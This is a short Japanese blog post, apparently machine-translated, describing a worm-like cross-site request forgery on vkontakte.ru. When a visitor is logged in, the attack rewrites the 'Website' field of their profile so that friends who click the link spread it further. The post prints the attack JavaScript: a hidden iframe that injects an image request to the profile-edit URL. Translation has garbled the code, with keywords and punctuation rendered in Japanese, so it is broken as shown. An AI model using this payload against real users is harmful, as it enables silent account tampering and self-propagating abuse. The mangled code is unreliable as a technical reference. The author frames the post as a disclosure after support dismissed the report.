サイトvkontakte.ruで面白い攻撃を見つけました。
tvoydohod.comにアクセスして、同時にVKontakteにログインしている場合、次のjavascriptが機能します。
<スクリプト>
関数doit(){
var html;
html = '<img src = http://vkontakte.ru/profileEdit.php?page = contacts&subm = 1&website = http://tvoydohod.com>';
window.frames ["frm"]。document.body.innerHTML = html;
}
</ script>
<iframe name = "frm" onload = "doit()" width = "0" height = "0"> </ iframe>
ご覧のとおり、アドレスが
vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.comの写真が要求されます。ブラウザはこのURLを要求し、vkontakteのプロファイルでは「Website」フィールドがtvoydohod.comと同じです。
次に、あなたのプロファイルで、あなたを信頼しているあなたの友人がこのリンクをクリックし、自分のためにプロファイルを変更します...など。
このタイプの攻撃は、
クロスサイトリクエストフォージェリと呼ばれます。 wikiはすべての解毒剤と有用な情報をまとめています。
CSRF自体はかなり退屈です。 しかし、この場合、面白いのは、すべての感染者がCSRFリンク配信マンになることです。
私はテクニカルサポートに手紙を書きましたが、そこで「これはバグではありません!」、「疑わしいリンクをクリックしないでください!」などに遭遇しました。 ユーザーに感謝し、修正してくれることを願っています。
そして、あなたは完全にソーシャルネットワークに住んでいるような単純な「ウイルス」について学ぶことに興味がありました=)